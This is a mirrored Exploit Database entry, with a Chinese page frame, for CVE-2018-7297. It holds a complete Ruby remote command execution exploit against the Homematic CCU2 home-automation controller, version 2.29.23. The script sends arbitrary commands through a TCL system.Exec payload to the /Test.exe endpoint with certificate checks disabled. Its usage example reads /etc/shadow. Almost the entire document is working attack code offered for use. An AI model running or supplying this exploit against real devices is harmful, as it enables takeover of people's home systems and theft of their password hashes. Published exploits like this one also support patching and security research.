Homematic CCU2 2.29.23 – Remote Command Execution

• Exploit Database
• 20 阅读

• 作者： Patrick Muench and Gregor Kopf
  日期： 2018-03-30
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/44368/

• #!/usr/bin/ruby
  
  # Exploit Title: Homematic CCU2 Remote Command Execution
  # Date: 28-03-18
  # Exploit Author: Patrick Muench, Gregor Kopf
  # Vendor Homepage: http://www.eq-3.de
  # Software Link: http://www.eq-3.de/service/downloads.html?id=268
  # Version: 2.29.23
  # CVE : 2018-7297
  
  # Description: http://atomic111.github.io/article/homematic-ccu2-remote-code-execution
  
  require 'net/http'
  require 'net/https'
  require 'uri'
  
  unless ARGV.length == 2
  STDOUT.puts <<-EOF
  Please provide url and the command, which is execute on the homematic
  
  Usage:
  execute_cmd.rb <ip.adress> <homematic command>
  
  Example:
  execute_cmd.rb https://192.168.1.1 "cat /etc/shadow"
  
  or
  
  execute_cmd.rb http://192.168.1.1 "cat /etc/shadow"
  
  EOF
  exit
  end
  
  # The first argument specifies the URL and if http or https is used
  url = ARGV[0] + "/Test.exe"
  
  # The second argument specifies the command which is executed via tcl interpreter
  tcl_command = ARGV[1]
  
  # define body content
  body = "string stdout;string stderr;system.Exec(\"" << tcl_command << "\", &stdout, &stderr);WriteLine(stdout);"
  
  # split uri to access it in a easier way
  uri = URI.parse(url)
  
  # define target connection, disabling certificate verification
  Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
  
  # define post request
  request = Net::HTTP::Post.new(uri.request_uri)
  
  # define the request body
  request.body = body
  
  # send the request to the homematic ccu2
  response = http.request(request)
  
  # print response to cli
  puts response.body
  end